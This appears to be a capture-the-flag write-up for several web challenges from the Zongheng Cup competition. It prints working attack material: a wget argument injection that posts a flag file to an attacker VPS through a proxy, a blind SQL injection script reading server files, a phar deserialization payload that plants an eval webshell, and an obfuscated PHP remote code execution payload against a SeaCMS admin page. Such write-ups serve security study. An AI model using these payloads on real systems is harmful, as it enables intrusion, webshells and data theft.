Zongheng Cup Network Security Competition Writeup

magic_download

run.sh

#!/bin/bash
ulimit -c 0      # core dump size (kb)
ulimit -t 60     # max cpu using (s/min)
ulimit -u 1500    # max number of process
ulimit -m 512000 # max memory (kb)

cd /home/ctf
stdbuf -oL echo -n "Please enter your IP:"
read IP
echo $IP|grep "^[0-9\.]\{7,15\}$" > /dev/null
if [ $? -ne 0 ]
then
    stdbuf -oL echo "Please input a IP!"
else
    exec /home/ctf/wget -P /tmp $IP
fi

This regular expression can be bypassed by newlines, please see the demonstration:

Then use wgetthe various parameters to pass the flag. You can set http_proxy for wget. You can use http_proxy to bring out the flag, set the http proxy to the attacker vps, and then listen to port 80. That's it.

-e http_proxy=vps --method=POST --body-file=/home/ctf/flag --header=X-Powered-By:Y1ng \\n127.0.0.1

easyci

If username exists, you can load_file to read the file and read the Apache site configuration file to get the root directory of the website.

#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com

import requests
import time
from urllib.parse import quote
from base64 import b64decode

url = "http://your_docker.cloudeci1.ichunqiu.com/public/index.php/home/login"
data = {
    
    "username" : "", "password" : "y1ng"}
result = ""

payload = 'select database()'
payload = 'password' #c3762483bc73d0b7943156d43911ce38
payload = 'select to_base64(substr((load_file("/etc/apache2/sites-enabled/000-default.conf")),596,650))' #/var/sercet/html   然后sqlmap的os-shell一把梭


for i in range(1,10000):
    time.sleep(0.06)
    low = 32
    high =128
    mid = (low+high)//2
    while(low<high):
        data["username"] = "0'or (ascii(substr((%s),%d,1)))>%d#" %(payload, i,mid)
        # print(data)
        r = requests.post(url, data)
        # print(r.text)
        if "用户名"  not in r.text:
            low = mid+1
        else:
            high = mid
        mid =(low+high)//2
    if(mid == 32 or mid == 127):
        break
    result +=chr(mid)
    print(result)
    try:
        print(b64decode(result.encode()).decode())
    except:
        pass

The root directory is /var/sercet/html and then use sqlmap’s –os-shell and it’s done.

---

easycms

Get the source code from www.zip, and get the database account and password admin/admin868 from config.php and use this password to enter the backend as well.

Then use this SSRF hole reading/flag: https://github.com/yzmcms/yzmcms/issues/53

---

hello php

www.zip Get the source code, a simple phar deserialization

<?php
class Config{
    
    
    public $title;
    public $comment;
    public $logo_url;
    public function __construct($title,$comment,$logo_url){
    
    
        $this->title= $title;
        $this->comment = $comment;
        $this->logo_url = $logo_url;
    }
}
$c = new Config("';echo('shell');eval(\$_POST['0']);//",'123','123');
@unlink("phar.jpg");
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($c);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
@rename("phar.phar","phar.jpg");
?>

The uploaded file name is the md5 of the timestamp. There is no echo. Write a script to find it:

#!/usr/bin/env python3
#-*- coding:utf-8 -*-
import time
import requests as req 
import hashlib
def md5(s):
	return hashlib.md5(s.encode()).hexdigest()

for i in range(100):
	url = f"http://eci-2zeb3stdvqw9aed67js3.cloudeci1.ichunqiu.com/static/{
      
      md5(str(int(time.time())))}.jpg"
	r = req.get(url)
	if r.status_code == 200:
		print(url)
		break
	else:
		print(i, r.status_code)
	time.sleep(1)

index.php triggers phar deserialization to write the horse into config.php

/?img=phar:///var/www/html/static/67d9c71da5d4926c0f3433659c0690fd.jpg

---

Let’s review the code together

Reference https://www.freebuf.com/vuls/241106.html

Enter the background admin/123456. Find adm1n/admin_weixin.php and use the non-alphanumeric RCE

POST /adm1n/admin_weixin.php?action=set HTTP/1.1
Host: eci-2ze9eefnhrp2znd5q2ia.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1265
Connection: close
Referer: http://eci-2ze9eefnhrp2znd5q2ia.cloudeci1.ichunqiu.com/adm1n/admin_weixin.php
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1608027846,1608659573,1608962046; UM_distinctid=1745809b7eda-0b8fe367096bfd8-4c312d7d-1fa400-1745809b7ee40; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1608966210; __jsluid_h=82317a29492d0410972d5c3b5bb35543; PHPSESSID=9d513712218467c2e573a918f8b8d725; __tins__21018907=%7B%22sid%22%3A%201608966619441%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201608968423945%7D; __51cke__=; __51laig__=2
Upgrade-Insecure-Requests: 1
isopen=n&url=https%3A%2F%2Fwww.seacms.net&title=%E6%B5%B7%E6%B4%8B%E5%BD%B1%E8%A7%86&ckmov_url=https%3A%2F%2Fwww.seacms.net%2Fvip.php%3Furl%3D+&dpic=https%3A%2F%2Fwww.seacms.net%2Fapi%2Fwx.jpg&follow=%E6%84%9F%E8%B0%A2%E6%82%A8%E7%9A%84%E5%85%B3%E6%B3%A8%E3%80%82&noc=%E6%9A%82%E6%97%A0%E4%BD%A0%E8%A6%81%E7%9A%84%E5%86%85%E5%AE%B9%E3%80%82&help=%E8%BF%99%E6%98%AF%E5%B8%AE%E5%8A%A9%E4%BF%A1%E6%81%AF%E3%80%82&topage=d&dwz=n&dwztoken=dwztoken&sql_num=15&msg1a=%E5%85%B3%E9%94%AE%E8%AF%8D1&msg1b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B91&msg2a=%E5%85%B3%E9%94%AE%E8%AF%8D2&msg2b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B92%3Ca+href%3D%27http%3A%2F%2Fwww.seacms.net%27%3E%E9%93%BE%E6%8E%A5%E6%B5%8B%E8%AF%95%3C%2Fa%3E%EF%BC%8C%E6%B5%8B%E8%AF%95%E7%BB%93%E6%9D%9F%E3%80%82&msg3a=%E5%85%B3%E9%94%AE%E8%AF%8D3&msg3b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B93&msg4a=%E5%85%B3%E9%94%AE%E8%AF%8D4&msg4b=%E5%85%B3%E9%94%AE%E8%AF%8D%E5%9B%9E%E5%A4%8D%E7%9A%84%E5%86%85%E5%AE%B94&msg5a=%E5%85%B3%E9%94%AE%E8%AF%8D5&msg5b=1231");$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');$___=$$__;$_($___[_]);//

POST /data/admin/weixin.php HTTP/1.1
Host: eci-2ze9eefnhrp2znd5q2ia.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1608027846,1608659573,1608962046; UM_distinctid=1745809b7eda-0b8fe367096bfd8-4c312d7d-1fa400-1745809b7ee40; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1608966210; __jsluid_h=82317a29492d0410972d5c3b5bb35543; PHPSESSID=9d513712218467c2e573a918f8b8d725; __tins__21018907=%7B%22sid%22%3A%201608966619441%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201608968423945%7D; __51cke__=; __51laig__=2
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
_=system("cat /flag");